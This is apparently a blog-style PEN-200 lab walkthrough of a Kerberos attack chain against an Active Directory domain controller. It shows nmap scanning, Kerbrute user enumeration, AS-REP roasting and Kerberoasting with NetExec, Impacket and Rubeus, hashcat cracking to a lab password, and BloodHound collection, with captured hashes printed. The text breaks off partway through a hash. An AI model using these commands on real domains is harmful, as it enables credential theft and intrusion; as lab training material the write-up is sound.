RETURN_TO_HOME

PEN-200 Practices - Active Directory Part 07

PEN-200 Practices - Active Directory Part 07

Active Directory (Full-case) Kerberos Based-attack for PEN-200 practices.

Active Directory

On this another internal PenTesting practices, the only thing we got is an IP Address:

10.48.184.32
  1. Network Enumeration and Port Discovery
┌──(kali㉿kali)-[~]
└─$ ping -c2 10.48.184.32
PING 10.48.184.32 (10.48.184.32) 56(84) bytes of data.
64 bytes from 10.48.184.32: icmp_seq=1 ttl=126 time=84.4 ms
64 bytes from 10.48.184.32: icmp_seq=2 ttl=126 time=81.9 ms
--- 10.48.184.32 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 81.942/83.171/84.400/1.229 ms

Continue:

<details> <summary>Click to view bash output</summary>
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.48.184.32 -oA nmap/nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at 
Warning: 10.48.184.32 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.48.184.32
Host is up (0.087s latency).
Not shown: 65506 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman
9389/tcp  open     adws
47001/tcp open     winrm
47362/tcp filtered unknown
49664/tcp open     unknown
49665/tcp open     unknown
49667/tcp open     unknown
49669/tcp open     unknown
49672/tcp open     unknown
49673/tcp open     unknown
49674/tcp open     unknown
49678/tcp open     unknown
49688/tcp open     unknown
49698/tcp open     unknown
49779/tcp open     unknown
52124/tcp filtered unknown
</details>
Nmap done: 1 IP address (1 host up) scanned in 29.87 seconds
<details> <summary>Click to view bash output</summary>
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p1-10000,47001,49664-49667 -sCV -sC -n 10.48.184.32 -oA nmap/nmapscan-ports
Starting Nmap 7.95 ( https://nmap.org ) at 
Nmap scan report for 10.48.184.32
Host is up (0.093s latency).
Not shown: 9986 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 68:f2:8b:17:15:7c:90:d7:4e:0f:8e:d1:4c:6a:be:98 (RSA)
|   256 b0:3a:a7:c3:88:2e:c1:0b:d7:be:1e:43:1c:f7:5b:34 (ECDSA)
|_  256 03:c0:ee:58:32:ae:6a:cc:8e:1a:7d:8b:20:c8:a2:bb (ED25519)
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-11-30 14:03:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: CONTROLLER.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: CONTROLLER.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 
| rdp-ntlm-info: 
|   Target_Name: CONTROLLER
|   NetBIOS_Domain_Name: CONTROLLER
|   NetBIOS_Computer_Name: CONTROLLER-1
|   DNS_Domain_Name: CONTROLLER.local
|   DNS_Computer_Name: CONTROLLER-1.CONTROLLER.local
|   Product_Version: 10.0.17763
|_  System_Time: 
| ssl-cert: Subject: commonName=CONTROLLER-1.CONTROLLER.local
| Not valid before: 2025-11-29T13:53:30
|_Not valid after:  2026-05-31T13:53:30
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CONTROLLER-1; OS: Windows; CPE: cpe:/o:microsoft:windows
</details>
Host script results:
| smb2-time: 
|   date: 
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.80 seconds

And great, we got domains:

CONTROLLER-1.CONTROLLER.local CONTROLLER-1 CONTROLLER.local
  1. Kerbrute for DC User Enumeration
┌──(kali㉿kali)-[~]
└─$ sudo ./kerbrute userenum -d CONTROLLER.local --dc CONTROLLER.local users.txt                
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
Version: v1.0.3 (9dad6e1) - 11/30/25 - Ronnie Flathers @ropnop
2025/11/30 14:35:53 >  Using KDC(s):
2025/11/30 14:35:53 >   CONTROLLER.local:88
2025/11/30 14:35:53 >  [+] VALID USERNAME:       admin1@CONTROLLER.local
2025/11/30 14:35:53 >  [+] VALID USERNAME:       administrator@CONTROLLER.local
2025/11/30 14:35:53 >  [+] VALID USERNAME:       admin2@CONTROLLER.local
2025/11/30 14:35:54 >  [+] VALID USERNAME:       machine2@CONTROLLER.local
2025/11/30 14:35:54 >  [+] VALID USERNAME:       httpservice@CONTROLLER.local
2025/11/30 14:35:54 >  [+] VALID USERNAME:       sqlservice@CONTROLLER.local
2025/11/30 14:35:54 >  [+] VALID USERNAME:       machine1@CONTROLLER.local
2025/11/30 14:35:54 >  [+] VALID USERNAME:       user2@CONTROLLER.local
2025/11/30 14:35:54 >  [+] VALID USERNAME:       user1@CONTROLLER.local
2025/11/30 14:35:54 >  [+] VALID USERNAME:       user3@CONTROLLER.local
2025/11/30 14:35:54 >  Done! Tested 100 usernames (10 valid) in 0.852 seconds

Users after Kerbrute Enumeration

┌──(root㉿kali)-[/]
└─# cat dc-users.txt 
admin2
administrator
admin1
httpservice
machine1
machine2
user1
sqlservice
user2
user3
  1. NetExec for AS-REP Roast

Identification:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap CONTROLLER.local -u dc-users.txt -p '' -k
LDAP        CONTROLLER.local 389    CONTROLLER-1     [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLLER-1) (domain:CONTROLLER.local)
LDAP        CONTROLLER.local 389    CONTROLLER-1     [+] CONTROLLER.local\admin2 account vulnerable to asreproast attack 
LDAP        CONTROLLER.local 389    CONTROLLER-1     [-] CONTROLLER.local\administrator: KDC_ERR_PREAUTH_FAILED
LDAP        CONTROLLER.local 389    CONTROLLER-1     [-] CONTROLLER.local\admin1: KDC_ERR_PREAUTH_FAILED
LDAP        CONTROLLER.local 389    CONTROLLER-1     [-] CONTROLLER.local\httpservice: KDC_ERR_PREAUTH_FAILED
LDAP        CONTROLLER.local 389    CONTROLLER-1     [-] CONTROLLER.local\machine1: KDC_ERR_PREAUTH_FAILED
LDAP        CONTROLLER.local 389    CONTROLLER-1     [-] CONTROLLER.local\machine2: KDC_ERR_PREAUTH_FAILED
LDAP        CONTROLLER.local 389    CONTROLLER-1     [-] CONTROLLER.local\user1: KDC_ERR_PREAUTH_FAILED
LDAP        CONTROLLER.local 389    CONTROLLER-1     [-] CONTROLLER.local\sqlservice: KDC_ERR_PREAUTH_FAILED
LDAP        CONTROLLER.local 389    CONTROLLER-1     [-] CONTROLLER.local\user2: KDC_ERR_PREAUTH_FAILED
LDAP        CONTROLLER.local 389    CONTROLLER-1     [+] CONTROLLER.local\user3 account vulnerable to asreproast attack 

Execution:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap CONTROLLER.local -u dc-users.txt -p '' -k --asreproast REP-CONTROLLER-01   
LDAP        CONTROLLER.local 389    CONTROLLER-1     [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLLER-1) (domain:CONTROLLER.local)
LDAP        CONTROLLER.local 389    CONTROLLER-1     $krb5asrep$23$admin2@CONTROLLER.LOCAL:db4b8776431e41dec9dc95eefe2a5f5a$252c434a3d451a8dcef554619b1b5087e7fb813aaa884150c3aac24d7b6e48368a45ec7383897885316320b5bbde2ee2ec2a740350a169d84b2639b1e704b15a8b70f1534b98ad39d3bc186d1c5f6ac5a850e1a404fee6ec70395e563954908c2fb5f9db3bc6aaa609ccaeea897982e086f74215bde0c1a6433c98f1662bb3552ed4ca21b10efa245ec8bc518ed0d69652acb13495c27fda98123bdacd326e0bc935376ec84b2c758aea3f0a10a42063c67f91ebf146b117ad833ba49bba3799c805e6a6fce8fef85462e233089586b9021b42e2c6d42ed86689258e8d39ff3eae3afa26960702410a079f94ebfb703b82558c09                                                                                                
LDAP        CONTROLLER.local 389    CONTROLLER-1     $krb5asrep$23$user3@CONTROLLER.LOCAL:e6a7a40263cc63cfda327f8eafdeae5e$0c36f08d23d6069e7d4190e225219109041602d6bf2ae3eaf7cc50bf8d2f50e7e6626d3f89df5c93b4a1e2f69cf2e66e129a5389ee82073e97e8f013114e162ba52e7167efbaf726ee3e8dba65a1e1a41e425d23d397bfb25c76cc5f92b862d723c9aecc137e475e0fca23baa2e1148b60e93008fdc7ebb44b40b0e2271dd9dc94bd92cbccad17fe71095e31951b00978956587151bdca4844ca2cfcfe465bf6bc204d2e006995e8dfef9079b407796f668c5843cda3ccf63f6f5a8293c4c04a9968b9aa3198d5b44173de18ae1feb54b806f745cfa41e65e0a24e31d0331fe90fa754b3680245521ff1ca0278d3f01bfb78e824

Hashcat for AS-REP Roast:

┌──(kali㉿kali)-[~]
└─$ hashcat -h | grep Kerberos
  19600 | Kerberos 5, etype 17, TGS-REP         | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth        | Network Protocol
  28800 | Kerberos 5, etype 17, DB              | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP         | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth        | Network Protocol
  28900 | Kerberos 5, etype 18, DB              | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP         | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP          | Network Protocol
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ hashcat -m 18200 rep-hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 18200 rep-hash.txt /usr/share/wordlists/rockyou.txt

Now we have Set credentials:

User: user3
Passwd: Password3
  1. Impacket for AS-REP Roast and GetUserSPNs.py
<details> <summary>Click to view text output</summary>
┌──(kali㉿kali)-[~]
└─$ netexec ldap CONTROLLER-1.CONTROLLER.local -u user3 -p Password3 -k --users           
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLLER-1) (domain:CONTROLLER.local)
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     [+] CONTROLLER.local\user3:Password3 
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     [*] Enumerated 13 domain users: CONTROLLER.local
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     Administrator                 2020-05-25 19:22:39 3        Built-in account for administering the computer/domain      
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     Guest                         <never>             0        Built-in account for guest access to the computer/domain    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     krbtgt                        2020-05-25 22:06:51 0        Key Distribution Center Service Account                     
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     Machine1                      2020-05-25 22:18:19 2                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     Machine2                      2020-05-25 22:18:50 2                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     Admin1                        2020-05-25 22:25:09 3                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     Admin2                        2020-05-25 22:25:34 2                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     User1                         2020-05-25 22:26:17 2                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     User2                         2020-05-25 22:27:47 2                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     SQLService                    2020-05-25 22:28:26 2                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     User3                         2020-05-25 22:34:38 0                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     HTTPService                   2020-05-25 22:39:17 2                                                                    
LDAP        CONTROLLER-1.CONTROLLER.local 389    CONTROLLER-1     sshd                          2020-05-25 22:57:22 1
</details>

Users after SMB shares Enumeration

Administrator
Guest
krbtgt
Machine1
Machine2
Admin1
Admin2
User1
User2
SQLService
User3
HTTPService
sshd

GetUserSPNs.py:

┌──(kali㉿kali)-[~]
└─$ GetUserSPNs.py CONTROLLER.local/User3:Password3 -dc-ip 10.48.184.32 -request
Impacket v0.14.0.dev0+20251107.4500.2f1d6eb2 - Copyright Fortra, LLC and its affiliated companies 
ServicePrincipalName                             Name         MemberOf                                                         PasswordLastSet             LastLogon                   Delegation 
-----------------------------------------------  -----------  ---------------------------------------------------------------  --------------------------  --------------------------  ----------
CONTROLLER-1/SQLService.CONTROLLER.local:30111   SQLService   CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local  2020-05-25 22:28:26.922527  2020-05-25 22:46:42.467441             
CONTROLLER-1/HTTPService.CONTROLLER.local:30222  HTTPService                                                                   2020-05-25 22:39:17.578393  2020-05-25 22:40:14.671872             
[-] CCache file is not found. Skipping...
$krb5tgs$23$*SQLService$CONTROLLER.LOCAL$CONTROLLER.local/SQLService*$97b71183b7c3ebd1690530546f27eab7$3237ba216116da1be21383d50b7acdafb9d01dfef4be88a3d39f87e2b13bba50ab3f1a544babadcb5385e383c8d166a08304247fd50373e168f6bbbbee6ee93bef548f8bc37daff1fa5252ec6c5f6bc02575475ab71063d73ff316273c2c13efccd1790d5b430ddeff0f995f1fd4934ff1ed37fbbb4fc76bc550dbf2048c5e2baf75ef6a7331f13e6f3c42a04b030793601d259c8389acae52b8903bbdd9a00703e54bfca2cf8acf7d8de5ff68a8059c94cd215078318527b519cbd700a8784ebd1723ef64942083d3bc4d15c333b27962e8408a11bda7f4731da44a27e0b3b0960280de2ce79d98f99450dafef138cb1560240448c782c169f7f82fa4014af909bd25ce37e0fc35c00daa62dd2ec0ec040c8f23e64f14ea8a8b689c787e679fa8aadef34effebdd7e2ae3ed89c4ca0b3c8c721d698863d9b4f76f3712532d1a19b9edc30b8504d7e5f82c39885b6cce3cca0ccfa1913cf252cc1944c8369747a42339fd3f98636f859045c88b26d19824b4eb867cabec6d65b1e5b7be6baa423e62ccf4b1b7ef7c47aa84b7d273dc8dc565b45d7c7b6f9f8a47749c4c2c44d9e56cf15f322b797d4a59c78c4e2b1485f58c39b26a566b058e32f294e795a41561c156ce9f974902e2cb51541c4cd1fdd762bab87c5a0be57f8a33c29ea706c52d3b66cbb9e548423ee8351848bded54417873bbae0f50d5773744b43fb463de29c89c7f8abf9d1d43acb0a32b9d728b9453810ee2bd5f6ff33bad2f6adaf18b68a99f32ce19651ea29295b04a4defff8a897c18a6d359c8ad453e21faac79cb9f14d6e9933e321e258dc2b12c76d38925d87bea6132c96505d1fd25326c7cdad20d853a70bcafee284b861f4a070a84eaf4815dd3bd3811b131b9e3b5e2d402881443dbb2f4b38a2be6f765e8c9f3d7621cd24c66fcb0f19114044ab6dd6750ad431152553595891b5f2a6369f0a8873600d858f34c24ee278fdc00bd405c786d99cc4f8f0cdfce81594682926a738abbdf96d7772f7c60c8c9d8e5d25c04e09f6246d46d66e267b23cab2ded8fb93dc6e8678b2f764db355d0d71cf7c7bb9e1e08025d55ea6926e489bb00ad369158c192853d6ee408f6d9163039277854d5c9dfd2158b49a4fddc923b42d0d0e6647b8e735bffa57ec56976f0dd200fbd8c029a6a06c56c3d08255213780ea72f5a35864fee40c727b7e30955bd83578f970796dff06c2a49ffae3061955fbdcf131e6848e8501b341c71142d6ec9b24da4569e943a78d374f8da0c492c8668b09df55b5ef35395e2d4f39564b5dfdc6014923586f96bf45f718516cff43ae17868ccfbbcba1aa6
$krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$CONTROLLER.local/HTTPService*$fa038381bc53557cea77a7d53af98026$e10ebae366ff5ce6e768fcd9f68b4ffcdedbb3994b63d5a4a16f5a8f6fb4507ca1451e8867be355c52feb5f63cb45f7516997e5ea45bb5d74e416ba69ab77ab5312255671952f58a23d3951fa5a2d3d99b1a0c3837c5a980d220c6ae470069fbd670e927db9474126662ba2ab735215cbcfa4028c4c0c3857c574bc08d13d1c19a8f3f7f03764259c790626669f4432bb2aa3627a97ab6b0ef9587b9e4f93d6b8e8ca521ee539356fbfd91241fd676152ea4cfa1c888123bdad4ac11eab352e63e60e09034ee131cbbd98c593bc834a14478598ddf6e5b4c9c9fec27d32c31e2e4cc5a88a47752b7cd7a2df306656b692d020f63751336b3e7d8e2a919650636578fcb5ed8e27a23e8b3433f266badd3e849f651c9d054f60e732918d4a120fec8b5a1366294fcdf8ca36b0c3b257471e6e67d4687f9b6b974fdb9407b0b454c335195ede383106c3678102d3c547dd02f122ab44deaca7527d37ae1880915638f9b8f93a3d479b9a067b5cb7895664d609e50b21bf4fae4b98bcb4489ca6418ea4aa596eceab04254e17ee0642b4c2cdf7a54b31c4a1dfe04edacf3dfc4b3685bfbb25cca9c9692091483968ff5088345e9b527a5be2a5fff45e33ab67668e874da7a7c265114e3eccc181026ae60d0ede8a27b1ca67be642127ac1a8e8b4e27175a96651415f3e13f5686a16a5973de3af834698456174f292790ba22ca1798dc7426ef81732b6f4a62717987fde9e862c525046f57675a915a949154397442f0e083e46b215303c1a634ad60c0e47885c0ebf4dc5f780e2da6f3a8f20dfcf271ff4ce3da3df98fa41d9285bbf6a3150d85791cb4eb5490b48b8488c5dec9bfaf66467931e68cd022a07a7e3590612cd2ca3791f5798116428e5989c755b8b89682f71c4f1381367d8a789e13bcde9980cfb63a9e1b14136d0a3c56fbf459da835ce346f86dfffd805df35e3eb9c3235d565f8b04396dd0e4950294d6fb622dee513ae0a0f1d4e332ae6d52e04a94cd41b4845cfb23fe080ec68f13c94d00382742e1532060f06f03b30312aec7e6723f97b35f60c92d5aa82d47a1cec6db36cb2ac1759524f07f67fe6bff66126c35b9b7e12354001073b18567b062cbde06dbdd5c0df473349de012317ae63b7dc89f079dce2b9dda01582ebab6acfad481c39f3053011a847b19e508508c59486510e06ff7da49f6ad1e76c4a61df1c8743c6c6db17b3a26deae5b2b8d7eee100e627b76a2c0900df97e9658cf252279087a16ae7ef985062f87e59f7298861a401633975b7bcfa72646318e54baf13220a1f44d79cb2310e17305c3324f011240440da497185
┌──(kali㉿kali)-[~]
└─$ hashcat -h | grep Kerberos
  19600 | Kerberos 5, etype 17, TGS-REP         | Network Protocol
  19800 | Kerberos 5, etype 17, Pre-Auth        | Network Protocol
  28800 | Kerberos 5, etype 17, DB              | Network Protocol
  19700 | Kerberos 5, etype 18, TGS-REP         | Network Protocol
  19900 | Kerberos 5, etype 18, Pre-Auth        | Network Protocol
  28900 | Kerberos 5, etype 18, DB              | Network Protocol
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
  13100 | Kerberos 5, etype 23, TGS-REP         | Network Protocol
  18200 | Kerberos 5, etype 23, AS-REP          | Network Protocol
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ hashcat -m 13100 tgs-hash.txt /usr/share/wordlists/rockyou.txt
  1. BloodHound-CE for Kerberos
bloodhound-ce-python -u User3 -p Password3 -k -ns 10.48.184.32 -c All -d CONTROLLER.local --zip
<details> <summary>Click to view bash output</summary>
┌──(kali㉿kali)-[~]
└─$ sudo bloodhound-ce-python -u User3 -p Password3 -k -ns 10.48.184.32 -c All -d CONTROLLER.local --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: controller.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: CONTROLLER-1.CONTROLLER.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: CONTROLLER-1.CONTROLLER.local
INFO: Found 14 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CONTROLLER-1.CONTROLLER.local
INFO: Done in 00M 15S
INFO: Compressing output into bloodhound.zip
</details>

  1. Rubeus.exe for Kerberos Attack (Internal)

To be comfortable, my privilege are already Administrator in the box via SSH:

PS C:\Users\Administrator\Downloads> dir
    Directory: C:\Users\Administrator\Downloads
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/25/2020   3:45 PM        1263880 mimikatz.exe
-a----        5/25/2020   3:14 PM         212480 Rubeus.exe
PS C:\Users\Administrator\Downloads>

Check-lists:

.\Rubeus.exe kerberoast
.\Rubeus.exe asreproast
.\Rubeus.exe harvest /interval:30
.\Rubeus.exe asktgt
.\Rubeus.exe brute /password:Password1 /noticket

Execution:

PS C:\Users\Administrator\Downloads> .\Rubeus.exe kerberoast
   ______        _
  (_____ \      | |                      
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
  v1.5.0
 
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts. 
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. 
[*] Searching the current domain for Kerberoastable users 
[*] Total kerberoastable users : 2
<details> <summary>Click to view text output</summary>
[*] SamAccountName         : SQLService
[*] DistinguishedName      : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local 
[*] ServicePrincipalName   : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet             : 5/25/2020 10:28:26 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca 
                             l:30111*$4C99CC6B642DC3911A407FD30EAE9E10$1C511C60D9887B1D8FA8A71A9119E732FB8C24 
                             E08FACCD46F854A5A18339D61476FC018351A21E27E8300D1F4E7BA7BD8C41FAA5F49CCB6F5B13B7
                             176C636CA808AE6366B3E9DB542DBD601809A30F59ACF1D5B100FAD5FA3E8587DF61647F6851AD2F
                             ADE1C36B2F90EF017C199227E0383BEC5040F895BD5CED7678021A230293E6CDA1F23904403CDE12
                             5BEFB3B1C8558978BA9F0CBF700DC0DF5E0D368E28FAE611D6CCA273C7B80D42A1C39D80490F71CB
                             8A3BA0338B3476BC747F09411BBD4457063F77ABE0489F774EF99C3F44F43B6285675FED70526522
                             9E87F76BC026BF8E8D6D17F1B24C61152A5FB6B60AA56ED0CC5F6A3B0B134A5B3662FCCDC55DD90C
                             9AFEF6440588C803D0CED981C024BA8673998C8FA864EBB46DE42D941B1606C8D6F5C0468A79426B
                             6E2BE08A8FDE9A907F9CCA35CB8CA820046C4D731BBDCCB895335D4BF6225CE06C7892BFB69F01C0
                             447612954D20D25A05190EBE57DB212E84DD69A2B2872DF6C535D13CAE9BE94387CA9A3B431029E7
                             9F652CECCFDBF552FD9069C0FF77899FE82B970BE70AABC679D1964385A7FCBC6E30566AE64A26ED
                             C7C1CA46043C71043C842BA6B5423A737115F6CBC29BF15719B2D7FFFF9491B7C8A439283A74BEF4
                             9659A91894E5DBE957B08FDE177EB3962665395F9495AEF7EFCDFCEB4E178E573FBFD64C2DB5F600
                             A2B1FD42F1408FA936A3513D18905A01AF5A294492AD2A9C25ACDFD2DDF965261177AC3E81F46FB4
                             6083DF27E68E4A16E01EAC6C379C40B7C259141CB0E1F75E28D1A77A4443B53E5E14953E34231908
                             C25336C257FACE52638BAD72229947845A4B54B9E438A6DA7C0172CE8756E6743EDAD6CF46EF69C0
                             479C0B4BD3F486369DF63E7E6F7D58CBECF60542D4BAC4BB6A0C01887683E8F8808A7310D83285D7
                             85D0CC1E0C07A4D6905EAA8C1124B55B21B883FD5429149D73FEAD35C54B206CD124866E12DE55F4
                             2626DA394E1F5B5E0FD8D66471F9A7BFB47A9C87C1D42CBF1E3849F8A6B3A2A76D2C2E46D53A27A7
                             FFAF08717F0BD5A750BCEEDDC81908BB824A0519CA2A6E490F7ABF6B381A474BC4172DC161F3C7F2
                             8551C0306DFEB9AEE52FAD56781010483D8CF1E529E2E4A34CC2B1FF4DD95B68A4EEAA920031C9C0
                             5615AE0B4DF8A75CA91DEBF1C77372894A89EAFA6F16E11EB441BDDB5AC9E3EF2D91F6917B03BA9E
                             F318692C515B40907C9943C8F13477A054D3D130349FB69491A51DE5B1774D99D64429C0016D5852
                             B39785404652F45844026A6F58DD3C489BA72AEA156CB9A24279DCF35FBB94B5B695A2314098E957
                             619A713FDF8103748187CCF3B4CCF61BC8B2EA15E1399E3B43D766B838B2822E11DE5C6B2DBDAAE5
                             6665409D4FABDF36A12C08657D7C8963C5BA7434734001B495DA714C92B21D7AA9053F709CF06E17
                             2A80D455E9B5AA4DCC8491E6F7E76840DCDAFAD57B28CC0796889DDF84C94D881DC75B40E4B22635
                             4656367C5759741A84B4A31B59259084487ABCF6754F16B2DC81D5B8A37C2974656AB411D69A5EB1
                             958BCD08EA3ECC1E7AAB60A2CCE4886B7A1B5580A02D2A20BC0DD74F45
</details>
 
[*] SamAccountName         : HTTPService
[*] DistinguishedName      : CN=HTTPService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName   : CONTROLLER-1/HTTPService.CONTROLLER.local:30222
[*] PwdLastSet             : 5/25/2020 10:39:17 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.lo
                             cal:30222*$38BA094E74BEA08FE410ADE2C8A8DF85$CD36A941A7F64D3D487F56D29FBB35A19D94
                             71AC6953DCFC38A94FBB9BB320A80A9F6EC2CF03F6CF5D1AB18CCB21DC9520D6426946360347978B
                             422DBDB6106FD314799327F8D5812F1219DF1B841D3F8DF95D7B7EFAF3DC1EBF9A0FAE96ABF8CCCC
                             DFBB829543537A0F55327A3E6241A12F462FE9EBBD990214693FDB76A0E35E8BC9642287F24E7158
                             38CB8217D80B3C4BC637B0A9EB3E7799E073803E97EE18CDD64F0B6844A3E01576EB9C2EFDCD43C7
                             1BF53FB7CB50BBCD15412B8858E5C1EBA35C7F8CDAECE4660ADE460C2A91FF21B31CFBE2624CFE41
                             D4310AEF934DE87B0A273F1045A0FB30E7B45A38F9CDB20A44819E2898F21BB54957D4CA31A95612
                             1CF3E29B970EFCC6C620E54D0EE13302C920006313DD27BF0B5B145B4DA593508B1FDB7FE183A26C
                             4CC640F6260E2F7F9DD77CACB05411E362E17022F01E1A96736E5F14C3EA7D30439AD55B9C1A9395
                             5EA865FAABF13BCA32CC2AA7E399E6D430F6B6D7E2B178EB4489CDC25021B86838AADC81A2AA92AC
                             775063957BDB356FE7D82969958CFAEAFFD53A80141752E6877825D4BDA62421DB0BA2771C599DC0
                             AFEBB777201B7A56A36F0D4DFDA4CD697A42B960FEE21CB979B64D418CB681DB6E8F474F46AA78BE
                             EBA9EEA58510B24338B1F10D83D9B5749047B6DB3E5677865494C52EC0B9B64786DEAE84E7A3556C
                             473E4784F763FBD2A733372449D7F4B3163EDC70EB85308CC36716C609333A1C57231359DD151F55
                             7A9AFB4F124B92FD5193D0C52ED13F0A896B8EE0D5F41EDD4729F6955C81D0E78620743C6DC3FCE1
                             3DE48886EEF68C1D93CD2B2C86E4F1C2B95FEF3382281C13BF5413CA39415CCF2E8D0835F96A4351
                             F5D3F147CCF93E7A72057A1CC6E8897B52998BB7381655E1065A454B4E41EE6A1B9D86F474F5F0E4
                             0BA283C0F679FC43F2A237ECC4D57FA63062D661F58F8C952F062BC72E7FDC86A1F6AB9BBDA80B11
                             5F7AEB9C1C917AFABEB1604B55850D869C7A22CFB983EF4067F1FDF6357F1B4555872F407B89A150
                             D15C42142BA7EEDD916CDA3A72F324042B9982062CEF5D7BC1FE3321FBB539A657189ABA6007E8E5
                             88A5AA70CD06B5A53FA2DCB360C0CCE5C0A8749E9D524F65F3E422AC89E51734490365265CDE14E5
                             DC54529CA24825980AF4F2100F733BF86B12464BDB7FB702007DAB7A14DA360E2BB7D218C0F2A259
                             ACBE646FBAC415FE37DBEF1A3FAC051923726E28B5CADE23AAE04446AC48DA95C0217504A3E60D43
                             21CF79CAA49B72248DB3D263767C22A73F461EAFF362D35443A87876CE183243A6F920AE9BD199B2
